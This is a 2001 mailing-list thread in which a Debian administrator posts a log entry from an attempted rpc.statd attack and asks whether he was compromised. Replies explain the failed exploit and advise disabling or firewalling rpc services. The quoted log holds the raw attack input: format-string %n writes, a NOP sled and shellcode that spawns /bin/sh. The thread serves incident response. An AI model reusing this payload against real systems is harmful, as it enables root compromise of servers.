Re: was I cracked? (rpc.statd, new version)

Thu, 12 Jul 2001 00:35:13 -0500 

   Thanks for this explanation.  I got hit with the exact same
   exploit this evening.  I compared my entire /etc structure to
   a known good one from almost a month ago and everything checks
   out.  I'm taking you advise and shutting down this service
   when not using it until I can secure it properly.
   
   thanks,
   jc

Thusly Thwacked By Jeremy Gaddis:
> Someone attempted to run the rpc.statd buffer overflow on
> you, but it appears to have failed.  The reason you see
> "/bin/sh" in the log entry is because that's part of the
> shellcode of the exploit.  The exploit, when successful,
> executes /bin/sh on your machine and leaves the attacker
> sitting at a root shell prompt.
> 
> As someone else stated, disable the rpc.* services if you
> don't need them.  If you do, they should be firewalled off
> and only accept packets from machines they need to "converse"
> with.
> 
> j.
> 
> --
> Jeremy L. Gaddis     <[EMAIL PROTECTED]>
> 
> -----Original Message-----
> From: Lukas Eppler [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, July 11, 2001 5:42 AM
> To: [email protected]
> Subject: was I cracked? (rpc.statd, new version)
> 
> 
> I have the following entries in /var/log/messages:
> 
> Jul  9 01:21:03 blue -- MARK --
> Jul  9 01:21:11 blue
> Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for
> ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z
> <F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x
> %n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220
> Jul  9 01:21:11 blue
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>
> \200<B0>^A<CD>\200<E8>\177<FF><FF><FF>
> Jul  9 01:41:03 blue -- MARK --
> 
> I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long
> known
> exploit fixed. I can't find modified binaries or any strange
> behaviour... was
> this a defeated attack? The second line says /bin/sh somewhere which
> makes me
> a bit concerned... Was I cracked?
> 
> Lukas
> 


-- 

Jeff Coppock            Nortel Networks
Systems Engineer        http://nortelnetworks.com
Major Accts.            Santa Clara, CA

Reply via email to